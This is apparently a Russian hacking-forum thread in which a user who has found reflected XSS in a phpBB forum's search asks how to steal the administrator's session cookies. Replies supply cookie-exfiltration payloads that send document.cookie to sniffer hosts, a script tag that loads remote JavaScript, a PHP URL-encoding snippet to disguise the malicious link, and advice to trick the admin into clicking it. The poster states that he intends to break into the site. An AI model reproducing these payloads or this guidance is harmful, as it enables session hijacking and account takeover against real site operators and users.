Здрасте :)
Извините если ни там запостил тему,,,,нужна помошь ачатовцев :)

Вобщем есть сайт, там поиск, там есть XSS (активная вроде))

вобщем если в поиске ввести

"><script>alert('antichat.ru')</script>

и нажать НАЙТИ,,,,то вылезает окошко с надписью античат...
(тестировал в опере и осле 7)

Теперь вопрос:

Как получить куки пользователей если ксс в поиске :confused:
Это вообще реально ?

Спасибо :)

Это посевная хсс а не активная .

Тоесть если я напишу админу письмо:

Привет
у тебя поиск не работает ( =

Он зайдет в поиск...и как мне его куки своровать ?

Я толко этого не пойму...

http://forum.antichat.ru/thread20140.html

Суй в линк снифер, шифруй, и суй линк зверю которого хочешь поиметь, смотри снифер, ставь куки, властвуй.

k0lbasa
Да я эту тему наизусть тебе могу рассказать ( =

Тоесть если у меня будет сайт:

мой_сайт.ру/xss.htm

в xss.htm код
'><script>img = new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;</script>

Я кидаю ссылку админу в ЛС тип зайди на этот сайт....он заходит и его куки у меня :confused:

Разве такое сработает ?

Ссылку ядовитую надо ему подсунуть где в урле чето типа того
"><script scr=http://xxx.ru/script.js></script>
где script.js шлет куки на снифер

это пассивная
хэк

Ссылку ядовитую надо ему подсунуть где в урле чето типа того
"><script scr=http://xxx.ru/script.js></script>
где script.js шлет куки на снифер

Как же такое сделать если ксс толко в поиске есть :(

Тоесть Xss, которую я в поиске нашёл...она вообще не нужна ?

Если что-то в поиске искать, выводится так:

www.site.com/ssearch.php?q=antichat.ru

Когда чеовек получает сообщение с такой ссылкой,,,,вот что появляется
http://www.google.ru/search?q=%22%3E%3Cscript%20src=http://xxx.ru/script.js%3E%3C/script%3E

http://i002.radikal.ru/0806/be/ff8796c81343.jpg

Когда чеовек получает сообщение с такой ссылкой,,,,вот что появляется
http://www.google.ru/search?q=%22%3E%3Cscript%20src=http://xxx.ru/script.js%3E%3C/script%3E

http://i002.radikal.ru/0806/be/ff8796c81343.jpg

закодируй ссылку в urlencode

закодируй ссылку в urlencode

Закодировал...вставил в сообщение,,отослал:::вот что вылезает у получателя

http://i002.radikal.ru/0806/d4/e6bed52b0a6a.png

Значит xss в поиске использовать нельзя :(

убрал...
http://i019.radikal.ru/0806/16/f0931c51f289.jpg
------------------------------------------------------------------------------------------------------------------
Я просканил этот сайт спайдером...вот он мне выдал
http://i014.radikal.ru/0806/38/6ce2dab5f776.jpg

Когда подставляю эти значения (в опере) и захожу на сайт....ни чего нет, я не авторизирован//


Это форум phpBB 2.0.17,,,,только не посылайте в тему phpBB ни один эксплойт не работает и ксс тоже в сообщениях не пашет...вот только в поиске и работает :(
З.Ы. там где точки я затёр пару символов))))

1) Залей скрипт, ворующий куки.
2) Потом закодируй УРЛ ?search="><script scr=http://xxx.ru/script.js></script>
например вот так:

<TEXTAREA width=1000 height=1000>
<?
$st = $_GET["a"];
for ($i=0;$i<strlen($st);$i++){
$ch = substr($st,$i,1);
echo "%".dechex(ord($ch));
}
?>
</TEXTAREA>

3) Отсылай ссылку одмину

diehard
ОГРОМНОЕ спасибо за помошь...

Но я не совсем понял....я на ВЫ с PHP....

1) Скрипт лежит на сайте www.xxx.ru/js.js
2) http://site.ru/forum/ssearch.php?search="><script scr=http://xxx.ru/js.js></script>

(ssearch.php всё правильно, там 2 s)

Вот тут не совсем понял....как закодировать ???

URL Encode ???
----------------------------------------------------------------------
Что это за код и куда его "пихать" :confused:

<TEXTAREA width=1000 height=1000>
<?
$st = $_GET["a"];
for ($i=0;$i<strlen($st);$i++){
$ch = substr($st,$i,1);
echo "%".dechex(ord($ch));
}
?> </TEXTAREA>

Ещё раз извините за возможно идиотские вопросы....прошу, только ответте :(

Этот код сохрани в 1.php и запусти под сервером, хоть на локалхосте: http://localhost/1.php?a=search="><script scr=http://xxx.ru/js.js></script>
В результате получится УРЛ вроде:

http://site.ru/forum/ssearch.php?%73%65%61%72%63%68%3d%22%3e%3c%73%63%7 2%69%70%74%20%73%63%72%3d%68%74%74%70%3a%2f%2f%78% 78%78%2e%72%75%2f%6a%73%2e%6a%73%3e%3c%2f%73%63%72 %69%70%74%3e

Выходит вот что...

http://localhost/1.php?a=search=%22%3E%3Cscript%20scr=http://САЙТ.ru/js.js%3E%3C/script%3E

Теперь нужно это подставлять к поиску на site.ru (который хочу взломать)

или что-то опять не так делаю ??? :(

ОМГ, теперь нажми ENTER
И исправь ошибку, не "scr=", а "src="

В общем вот что в итоге получается (сколько я не клацкал)) на интер)

http://localhost/1.php?a=search=%22%3E%3Cscript%20src=http://САЙТ.ru/js.js%3E%3C/script%3E

Получившуюся ссылку засовую в сообщение и отсылаю:
(вот эту ссылку)

antichat.ru (http://SITE.ru/forum/ssearch.php?q=%22%3E%3Cscript%20src=http://xxx.ru/js.js%3E%3C/script%3E)

Может переадресацию нужно сделать какнить на мой js.js

Если на неё нажать,,,попадаю сюда:

http://site.ru/forum/ssearch.php?q=%22%3E%3Cscript%20src=http://xxx.ru/js.js%3E%3C/script%3E
------------------------------------------------------------------------

Снифер пустой,,,,может из за кода js.js

Я в нём вот что пишу,,,но помойму не работает он вовсе)):

<script>img = new Image(); img.src = "http://s.netsec.ru/login.gif?"+document.cookie;</script>

Может вот так сделать:
http://localhost/1.php?a=search="><script language="JavaScript">document.location.href=http://ххх.ru/js.js></script>


----------------------------------------------------------------------
не перенаправляет так...

ОМФГ! Лучше просто забей на это дело

-Хочешь спать спокойно, лучше не начинай.

ОМФГ! Лучше просто забей на это дело
Этого я уж точно не сделаю....

Мб если ты не можешь простейшего(утащить куки) не стоит в это ввязыватся?(советую перечитать мануал по xss)